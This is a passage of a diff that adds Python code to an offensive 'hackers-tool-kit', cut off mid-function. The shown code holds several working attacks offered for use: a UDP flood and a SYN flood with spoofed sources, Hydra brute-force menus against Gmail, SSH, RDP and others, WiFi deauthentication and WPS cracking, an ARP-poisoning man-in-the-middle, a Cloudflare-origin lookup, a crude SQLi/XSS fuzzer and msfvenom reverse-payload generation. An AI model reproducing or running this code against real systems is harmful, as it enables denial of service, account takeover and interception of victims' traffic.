+ port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + 